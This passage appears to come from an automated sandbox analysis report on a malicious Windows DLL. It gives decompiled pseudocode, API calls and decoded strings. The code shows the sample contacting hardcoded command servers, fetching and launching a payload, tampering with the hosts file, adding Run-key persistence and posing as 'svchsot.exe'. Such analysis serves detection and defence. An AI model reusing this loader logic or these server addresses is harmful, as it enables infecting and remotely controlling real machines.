            								wsprintfA(0x10016ae0, "%s", _t71);
            								_t102 = _t102 + 0xc;
            							}
            						}
            						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
            						_t102 = _t102 + 0xc;
            						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
            						goto L5;
            					} else {
            						goto L7;
            					}
            					do {
            						L7:
            						_t67 = _t82;
            						asm("cdq");
            						_t95 = 2;
            						_t86 = _t67 % _t95;
            						__eflags = _t67 % _t95;
            						if(_t67 % _t95 == 0) {
            							_t32 = _t82 + _t71;
            							 *_t32 =  *(_t82 + _t71) + 0x4b;
            							__eflags =  *_t32;
            						} else {
            							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
            						}
            						_t82 = _t82 + 1;
            						__eflags = _t82 - _v8;
            					} while (_t82 < _v8);
            					goto L11;
            				}
            			}
































            0x10008286
            0x10008294
            0x1000829b
            0x1000829d
            0x100082a6
            0x100082a8
            0x100082b8
            0x100082ba
            0x100082bc
            0x100082ca
            0x100082d4
            0x100082db
            0x100082e0
            0x100082e8
            0x100082f7
            0x1000830a
            0x1000830f
            0x10008312
            0x10008314
            0x10008314
            0x10008328
            0x1000832a
            0x10008333
            0x10008335
            0x10008336
            0x10008339
            0x10008344
            0x10008344
            0x10008344
            0x10008346
            0x10008348
            0x10008350
            0x10008356
            0x10008358
            0x10008359
            0x10008364
            0x1000835b
            0x10008361
            0x10008361
            0x1000836f
            0x10008374
            0x10008375
            0x1000837d
            0x1000837e
            0x10008381
            0x1000838f
            0x10008394
            0x1000839a
            0x1000839d
            0x00000000
            0x00000000
            0x1000839f
            0x100083a5
            0x00000000
            0x100083b0
            0x100083b0
            0x100083b2
            0x100083b4
            0x100083d2
            0x100083d8
            0x100083db
            0x100083dc
            0x100083de
            0x100083e3
            0x100083eb
            0x100083ed
            0x100083ee
            0x100083f7
            0x100083fd
            0x100083fd
            0x100083ee
            0x1000840c
            0x10008411
            0x10008423
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x100083b6
            0x100083b6
            0x100083b6
            0x100083ba
            0x100083bb
            0x100083bc
            0x100083be
            0x100083c0
            0x100083c8
            0x100083c8
            0x100083c8
            0x100083c2
            0x100083c2
            0x100083c2
            0x100083cc
            0x100083cd
            0x100083cd
            0x00000000
            0x100083b6

            APIs
            • Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
            • wsprintfA.USER32 ref: 100083F7
            Strings
            • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
            • 127.0.0.1, xrefs: 10008405
            • http://107.163.56.232:18963/main.php, xrefs: 10008364
            • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
            • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
            • 8.8.8.8, xrefs: 10008400
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleepwsprintf
            • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
            • API String ID: 1749205058-515792873
            • Opcode ID: 0a65ecdc5c10997eff8f8d016a8dbeb38ea98cc6370c935f154c7ff009c99062
            • Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
            • Opcode Fuzzy Hash: 0a65ecdc5c10997eff8f8d016a8dbeb38ea98cc6370c935f154c7ff009c99062
            • Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: %s\%s$107.163.56.232:18963/main.php$12071239$L2ltYWdlLnBocA==$NPKI$P
            • API String ID: 3472027048-923127458
            • Opcode ID: 7ff9c99e21f47383f41bb9b6fce63d29a7719f8193ab9cd7f6c9b1b7bc0450e4
            • Instruction ID: 78fb94449fb561d3ad5dbef52e8c6d42d31868d332eaa78ded5861372861b631
            • Opcode Fuzzy Hash: 7ff9c99e21f47383f41bb9b6fce63d29a7719f8193ab9cd7f6c9b1b7bc0450e4
            • Instruction Fuzzy Hash: 41417276804259AEEB11D7B4DC45BEE7BBCFB49350F1004E6E248E6182EA709B848F11
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 431 26e0c61-26e0d72 433 26e0e0c-26e0e20 MessageBoxA ExitProcess 431->433 434 26e0d78-26e0d97 call 26e10ae call 26e0fc9 call 26e0ecf 431->434 441 26e0d9d-26e0da9 call 26e131c 434->441 442 26e0e26-26e0e2f 434->442 441->442 449 26e0dab-26e0db9 441->449 444 26e0e46-26e0e74 call 26e1496 VirtualFree 442->444 445 26e0e31-26e0e43 442->445 445->444 450 26e0dbb-26e0dc1 449->450 451 26e0dc3-26e0dc9 449->451 452 26e0df0-26e0e00 wsprintfA 450->452 453 26e0dcb-26e0de7 451->453 454 26e0de9-26e0def 451->454 455 26e0e06 452->455 453->455 454->452 455->433
            APIs
            • wsprintfA.USER32(?,?,?,?), ref: 026E0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 026E0E18
            • ExitProcess.KERNEL32(00000000), ref: 026E0E20
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 026E0E69
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: ExitFreeMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 789587083-4208015514
            • Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction ID: 9507d669ea0d84cb36ebe75c52d6cd4220fc78d5a74f692721021fac4f0baeca
            • Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction Fuzzy Hash: 4531A9322062869FEF399F10CC84FEB77A9AF46314F040169ED47A6285EB70A8158B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				short _v32;
            				CHAR* _v72;
            				void _v76;
            				char _v80;
            				char _v96;
            				void _v355;
            				char _v356;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t19;
            				intOrPtr _t20;
            				void* _t22;
            				void* _t24;
            				void* _t35;
            				void* _t36;
            				void* _t38;
            				signed int _t39;
            				signed int _t41;
            				void* _t43;
            				void* _t51;
            				void* _t57;
            
            				_t57 = __eflags;
            				_t43 = __edx;
            				_t38 = __ecx;
            				Sleep(0x2710); // executed
            				_t19 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw="); // executed
            				_v12 = _t19;
            				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000); // executed
            				_push(0x300000);
            				_push(0);
            				_v8 = _t20;
            				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
            				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000); // executed
            				_t50 = _t22;
            				if(_t22 <= 0) {
            					L1:
            					Sleep(0x1b7740); // executed
            					goto L1;
            				}
            				_t39 = 0x40;
            				_v356 = 0;
            				_t24 = memset( &_v355, 0, _t39 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
            				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
            				__eflags = 0;
            				_t41 = 0x10;
            				memset( &_v76, 0, _t41 << 2);
            				_v80 = 0x44;
            				_v72 = "wINsTA0\\dEFauLT";
            				_v32 = 0;
            				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
            				_t35 = 1;
            				return _t35;
            			}




























            0x10008578
            0x10008578
            0x10008578
            0x1000858f
            0x10008596
            0x100085a0
            0x100085a4
            0x100085ab
            0x100085ac
            0x100085ae
            0x100085b1
            0x100085bd
            0x100085c2
            0x100085c9
            0x100085cb
            0x100085d0
            0x00000000
            0x100085d0
            0x100085d8
            0x100085df
            0x100085e5
            0x100085e7
            0x100085e9
            0x100085fd
            0x1000860e
            0x10008616
            0x1000861d
            0x1000861e
            0x10008623
            0x1000863d
            0x10008644
            0x10008649
            0x10008650
            0x10008655

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep$wsprintf
            • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
            • API String ID: 3195947292-2583752392
            • Opcode ID: 81d4b67f33cd8103372a750bc937ee3debd6cc9b6b879e214ebfa81445bf7d0f
            • Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
            • Opcode Fuzzy Hash: 81d4b67f33cd8103372a750bc937ee3debd6cc9b6b879e214ebfa81445bf7d0f
            • Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 527 100044ad-100044cb call 1003ddb5 530 100044cd-100044ed call 1003115e GetExtendedUdpTable 527->530 531 1000451f 527->531 538 100044f4-10004502 call 100331a8 530->538 539 100044ef-100044f2 530->539 532 10004520 531->532 533 1000454b-1000455c call 1002d4f9 call 10031d9d 531->533 532->533 536 10004522 532->536 547 1000455f-10004563 533->547 541 10004525-10004535 call 1003b594 536->541 542 10004504-10004507 538->542 550 10004509-10004518 GetExtendedUdpTable 538->550 539->538 539->542 551 10004541-10004548 541->551 552 10004537-1000453d 541->552 542->547 553 1000451a-1000451c 550->553 554 1000451e 550->554 551->533 552->541 555 1000453f 552->555 553->547 554->531 555->533
            APIs
            • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100044E9
            • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 10004513
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: ExtendedTable
            • String ID: C:\Users\user\Desktop\12071239$iphlpapi.dll
            • API String ID: 2407854163-1313959009
            • Opcode ID: 499cfaa8f9372a84d10054c90b2a6e2f2fca9727855b1882b36cc6280796b6f4
            • Instruction ID: f91f925f9b83e96973c7636e8e4c3350b19b26df2d9313003df76843625d1f5d
            • Opcode Fuzzy Hash: 499cfaa8f9372a84d10054c90b2a6e2f2fca9727855b1882b36cc6280796b6f4
            • Instruction Fuzzy Hash: 2721D4B5900909BFEB11DB688C81DBE77BCEF81396F224956F5509A186EB30AE408664
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 25%
            			E10006AE3() {
            				void* _t4;
            				void* _t5;
            				void* _t6;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				void* _t10;
            				void* _t11;
            				void* _t12;
            
            				L0:
            				while(1) {
            					L0:
            					asm("les edx, [eax*4+0x680975c0]");
            					L2:
            					Sleep(0x2bf20); // executed
            					L1:
            					_push(0x1218);
            					_push(_t4);
            					E1000CCFC(_t4, _t5, _t8, _t9, _t11, _t8);
            					_push(_t8);
            					_push("5762479093"); // executed
            					E10006499(_t4, _t5, _t6, _t7, _t8, _t11, _t12); // executed
            					_t10 = _t10 + 0x14;
            					continue;
            					 *(__esi + 0x1214) = __ebx;
            					__eax = CreateThread(__ebx, __ebx, E1000687E, __esi, __ebx, __ebx);
            					__edi = __eax;
            					0x10033df6(__edi, 0xffffffff);
            					asm("invalid");
            					L4:
            					0x100314f6(__eax, __edi);
            					goto L2;
            				}
            			}












            0x10006ae3
            0x10006ae3
            0x10006ae3
            0x10006ae3
            0x10006ae9
            0x10006aee
            0x10006acb
            0x10006acb
            0x10006ad0
            0x10006ad2
            0x10006ad7
            0x10006ad8
            0x10006add
            0x10006ae2
            0x00000000
            0x10006afc
            0x10006b02
            0x10006b08
            0x10006b0d
            0x10006b12
            0x10006b13
            0x10006b15
            0x00000000
            0x10006b15

            APIs
              • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
              • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
            • Sleep.KERNEL32(0002BF20), ref: 10006AEE
            • CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006B02
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateFormatSleepThreadTime___crtwsprintf
            • String ID: 5762479093
            • API String ID: 1808643731-3483958698
            • Opcode ID: dcb3929c8cbd93dc7e1bd02e5d37e618f0a974b1c80e1f068178b945f52ce8b6
            • Instruction ID: 9823e93c97f77b06fa5572501396a0b583494c1e5e7e9a8033287718f0397463
            • Opcode Fuzzy Hash: dcb3929c8cbd93dc7e1bd02e5d37e618f0a974b1c80e1f068178b945f52ce8b6
            • Instruction Fuzzy Hash: E7E0DFA014822A7AF211EB708DC6DBB2A5EDF173F43648528F428A518BEB609C258473
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • Sleep.KERNEL32(?,80000002,00000000,00000000,000F003F,?), ref: 1000856D
            Strings
            • U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10008480
            • svchsot.exe, xrefs: 10008535
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$svchsot.exe
            • API String ID: 3472027048-2214221337
            • Opcode ID: cffbc5b1baab207dafd9a07c7f5021fee2451e83c4983c145358c973218ebce8
            • Instruction ID: 3f432ea22ec6b5eeb881382db9406ff9247849e33555dbb4a392728026724a00
            • Opcode Fuzzy Hash: cffbc5b1baab207dafd9a07c7f5021fee2451e83c4983c145358c973218ebce8
            • Instruction Fuzzy Hash: 2F311BB690015DBEEB11CBA4CD81DEFB7BDFB08284F1040B6F645E2105EA71AF458BA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 57%
            			E10007112() {
            				signed int _v8;
            				void _v263;
            				signed char _v264;
            				void _v1287;
            				signed char _v1288;
            				void* _t23;
            				void* _t24;
            				void* _t30;
            				signed int _t35;
            				void* _t36;
            				signed int _t40;
            				void* _t44;
            				void* _t51;
            				signed int _t52;
            				void* _t55;
            				void* _t57;
            				signed int _t63;
            				void* _t64;
            				void* _t65;
            				void* _t66;
            				void* _t67;
            				void* _t69;
            				void* _t71;
            				void* _t74;
            
            				_t24 = E1000CCAE(_t23, 0x80000, _t44, _t56, _t57, _t64, _t66, _t71, _t74, 0x80000); // executed
            				_t65 = _t24;
            				while(1) {
            					_v1288 = _v1288 & 0x00000000;
            					memset( &_v1287, 0, 0xff << 2);
            					_v264 = _v264 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					memset( &_v263, 0, 0 << 2);
            					_t69 = _t67 + 0x18;
            					asm("stosw");
            					asm("stosb");
            					_t30 = E10005C4C( &_v264, 0x100); // executed
            					_t72 = _t30;
            					_t51 = 0x3f;
            					if(_t30 == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v264);
            					}
            					_push("%s");
            					_push( &_v1288);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(0x80000, _t51, _t65, _t66, _t72, _t65);
            					_t35 = E100061BD(_t51, _t65, _t72, _t74,  &_v1288, _t65, 0x80000); // executed
            					_t67 = _t69 + 0x24;
            					_v8 = _t35;
            					if(_t35 > 7) {
            						_t52 = 0;
            						__eflags = _t35;
            						if(_t35 <= 0) {
            							L11:
            							_push(_t65);
            							_t36 = E1000CD02(_t52, _t65);
            							__eflags = _t36 - 0x10;
            							if(_t36 <= 0x10) {
            								_push(_t65);
            								__eflags = E1000CDF2(_t65);
            								_t55 = 0x10016ae0;
            								if(__eflags != 0) {
            									wsprintfA(0x10016ae0, "%s", _t65);
            									_t67 = _t67 + 0xc;
            									E1000570F(_t55, _t56, __eflags, _t74);
            								}
            							}
            							goto L5;
            						} else {
            							goto L7;
            						}
            						do {
            							L7:
            							_t40 = _t52;
            							asm("cdq");
            							_t63 = 2;
            							_t56 = _t40 % _t63;
            							__eflags = _t40 % _t63;
            							if(_t40 % _t63 == 0) {
            								_t20 = _t52 + _t65;
            								 *_t20 =  *(_t52 + _t65) + 0x4b;
            								__eflags =  *_t20;
            							} else {
            								 *(_t52 + _t65) =  *(_t52 + _t65) + 0x3a;
            							}
            							_t52 = _t52 + 1;
            							__eflags = _t52 - _v8;
            						} while (_t52 < _v8);
            						goto L11;
            					}
            					L5:
            					Sleep( *0x10012500); // executed
            				}
            			}



























            0x10007124
            0x1000712a
            0x1000712c
            0x1000712c
            0x10007140
            0x10007142
            0x1000714b
            0x1000714d
            0x1000715c
            0x1000715c
            0x1000715e
            0x10007160
            0x10007168
            0x1000716e
            0x10007170
            0x10007171
            0x1000717c
            0x10007173
            0x10007179
            0x10007179
            0x10007187
            0x1000718c
            0x1000718d
            0x10007195
            0x10007196
            0x10007199
            0x100071a7
            0x100071ac
            0x100071b2
            0x100071b5
            0x100071c8
            0x100071ca
            0x100071cc
            0x100071ea
            0x100071ea
            0x100071eb
            0x100071f0
            0x100071f4
            0x100071fb
            0x10007203
            0x10007205
            0x10007206
            0x1000720f
            0x10007215
            0x10007218
            0x10007218
            0x10007206
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x100071ce
            0x100071ce
            0x100071ce
            0x100071d2
            0x100071d3
            0x100071d4
            0x100071d6
            0x100071d8
            0x100071e0
            0x100071e0
            0x100071e0
            0x100071da
            0x100071da
            0x100071da
            0x100071e4
            0x100071e5
            0x100071e5
            0x00000000
            0x100071ce
            0x100071b7
            0x100071bd
            0x100071bd

            APIs
            Strings
            • http://107.163.56.232:18963/main.php, xrefs: 1000717C
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleepwsprintf
            • String ID: http://107.163.56.232:18963/main.php
            • API String ID: 1749205058-3919619334
            • Opcode ID: b5d0bec9b7d6edd60cc6ed646ffe3ccda022ea413c9355326a19837c98786684
            • Instruction ID: 54bd4540d716e36ea29f190889fbbfc8768f4e24644525e17297a910cae38aae
            • Opcode Fuzzy Hash: b5d0bec9b7d6edd60cc6ed646ffe3ccda022ea413c9355326a19837c98786684
            • Instruction Fuzzy Hash: E0213E76D0465576F725D328CC56FDF7BACEF053C4F2000A6F608A50C6EB79AA818A61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 52%
            			E100061BD(void* __ecx, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v8;
            				intOrPtr _v12;
            				char _v1036;
            				void* __ebx;
            				void* __ebp;
            				void* _t19;
            				intOrPtr _t20;
            				intOrPtr _t21;
            				intOrPtr _t37;
            				void* _t39;
            				char _t44;
            				void* _t48;
            				void* _t49;
            				void* _t50;
            				void* _t51;
            
            				_t44 = 0;
            				_t37 = 0;
            				_push(0);
            				_push(0);
            				_push(0);
            				_push(0);
            				_v8 = 0;
            				_t19 = E10001000(__ecx, __eflags, __fp0, "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1"); // executed
            				_pop(_t39);
            				_push(_t19); // executed
            				_t20 = E10003F0A(); // executed
            				_t50 = _t49 + 0x14;
            				_v12 = _t20;
            				if(_t20 != 0) {
            					_t21 = E10003F24(_t20, _a4, 0, 0, 0x80000100, 0); // executed
            					_t51 = _t50 + 0x18;
            					__eflags = _t21;
            					_a4 = _t21;
            					if(_t21 != 0) {
            						__eflags = _a4 - 0xffffffff;
            						if(__eflags == 0) {
            							L9:
            							E10003F58(_a4);
            							_t44 = _t37;
            							L10:
            							E10003F58(_v12);
            							return _t44;
            						}
            						while(1) {
            							_push(0x400);
            							_push(_t44);
            							E1000CCFC(_t37, _t39, 0x400, _t48, __eflags,  &_v1036);
            							E10003F41(_a4,  &_v1036, 0x400,  &_v8);
            							_push(_v8);
            							_push( &_v1036);
            							_push(_a8 + _t37);
            							E1000CD50(_a8 + _t37, 0x400);
            							_t37 = _t37 + _v8;
            							_t51 = _t51 + 0x28;
            							__eflags = _v8 - _t44;
            							if(_v8 <= _t44) {
            								break;
            							}
            							__eflags = _t37 - _a12;
            							if(__eflags < 0) {
            								continue;
            							}
            							break;
            						}
            						E10003F92(_a4);
            						goto L9;
            					}
            					E10003F58(0);
            					goto L10;
            				}
            				return 0;
            			}


















            0x100061c8
            0x100061ca
            0x100061cc
            0x100061cd
            0x100061ce
            0x100061cf
            0x100061d5
            0x100061d8
            0x100061dd
            0x100061de
            0x100061df
            0x100061e4
            0x100061e9
            0x100061ec
            0x10006201
            0x10006206
            0x10006209
            0x1000620b
            0x1000620e
            0x10006219
            0x1000621d
            0x10006276
            0x10006279
            0x1000627f
            0x10006281
            0x10006284
            0x00000000
            0x1000628a
            0x10006225
            0x10006225
            0x1000622c
            0x1000622e
            0x10006242
            0x10006247
            0x10006250
            0x10006256
            0x10006257
            0x1000625c
            0x1000625f
            0x10006262
            0x10006265
            0x00000000
            0x00000000
            0x10006267
            0x1000626a
            0x00000000
            0x00000000
            0x00000000
            0x1000626a
            0x1000626f
            0x00000000
            0x10006275
            0x10006211
            0x00000000
            0x10006216
            0x00000000

            APIs
              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C
            • ___crtGetTimeFormatEx.LIBCMT ref: 10006201
            Strings
            • TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061D0
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FormatInternetOpenTime___crt
